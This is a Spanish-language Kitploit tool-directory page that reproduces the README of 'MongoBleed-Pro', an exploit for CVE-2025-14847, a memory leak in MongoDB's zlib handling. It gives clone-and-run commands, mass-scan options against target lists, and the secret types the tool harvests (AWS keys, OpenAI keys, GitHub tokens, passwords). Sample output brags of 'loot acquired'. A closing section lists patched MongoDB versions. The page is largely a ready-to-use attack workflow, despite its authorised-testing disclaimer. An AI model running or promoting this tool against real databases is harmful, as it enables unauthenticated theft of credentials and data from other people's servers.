Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14847_Expolit — una vulnerabilidad crítica de divulgación de memoria en el manejo de compresión zlib de MongoDB. Esta herramienta permite a los investigadores de seguridad extraer datos sensibles de instancias vulnerables de MongoDB. | Kitploit
Herramientas/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosRecopilación de InformaciónPruebas de PenetraciónDetección de SecretosAprendizaje y EducaciónSeguridad de Bases de Datos

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

una vulnerabilidad crítica de divulgación de memoria en el manejo de compresión zlib de MongoDB. Esta herramienta permite a los investigadores de seguridad extraer datos sensibles de instancias vulnerables de MongoDB.

Ver Repositorio
333hace 7 mesesRevisado por Kitploit

MongoBleed-Pro ☠️

CVE Python License Status

Herramienta avanzada de explotación de fugas de memoria de MongoDB
Sigue aprendiendo | Sigue hackeando con CyberTechAjju


🔥 Acerca de

MongoBleed-Pro es una herramienta avanzada de explotación para CVE-2025-14847, una vulnerabilidad crítica de divulgación de memoria en el manejo de compresión zlib de MongoDB. Esta herramienta permite a los investigadores de seguridad extraer datos sensibles de instancias vulnerables de MongoDB.

⚠️ Aviso legal

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas.


💀 Detalles de la vulnerabilidad


🚀 Características

  • ☠️ Interfaz estilo hacker - Interfaz de terminal élite con animaciones
  • ⚡ Escaneo multihilo - Extracción rápida de memoria con hilos configurables
  • 🎯 Detección automática de vulnerabilidades - Verificación automática de vulnerabilidad antes de la explotación
  • 🔑 Detección de patrones secretos - Encuentra claves AWS, tokens API, contraseñas, correos electrónicos
  • 📊 Progreso en tiempo real - Visualización en vivo de la fuga de memoria
  • 💾 Exportación de datos - Guarda los datos extraídos en archivos para análisis
  • 🌐 Escaneo masivo - Escanea múltiples objetivos desde un archivo

📦 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Uso

Uso básico

root@kitploit:~
python3 mongobleed_pro.py

Objetivo específico

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Puerto personalizado

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Escaneo masivo

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Opciones avanzadas

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Todas las opciones


📸 Capturas de pantalla

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Tipos de secretos detectados

  • 🔑 Claves de acceso de AWS (AKIA...)
  • 🤖 Claves API de OpenAI (sk-...)
  • 🐙 Tokens de GitHub (ghp_...)
  • 🔐 Contraseñas y secretos
  • 📧 Direcciones de correo electrónico

📁 Archivos de salida

ArchivoDescripción
loot_<host>.txtSecretos extraídos en formato legible
dump_<host>.binVolcado de memoria sin procesar para análisis manual

🛡️ Mitigación

Si eres administrador de MongoDB, actualiza a las versiones parcheadas:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Autor

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 Licencia

Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.


⭐ Soporte

Si encontraste útil esta herramienta, ¡dale una ⭐ en GitHub!


「 Sigue aprendiendo | Sigue hackeando 」
Hecho con ❤️ por CyberTechAjju

Descargar herramienta
PropiedadDetalles
CVE IDCVE-2025-14847
Tipo de vulnerabilidadDivulgación de memoria
Versiones afectadasMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Causa raízSobreelectura de búfer en la descompresión zlib
ImpactoFuga de memoria remota no autenticada
ArgumentoDescripciónPor defecto
--targetIP/URL objetivoSímbolo interactivo
--fileArchivo con lista de objetivosNinguno
--threadsNúmero de hilos50
--min-offsetDesplazamiento mínimo de memoria20
--max-offsetDesplazamiento máximo de memoria8192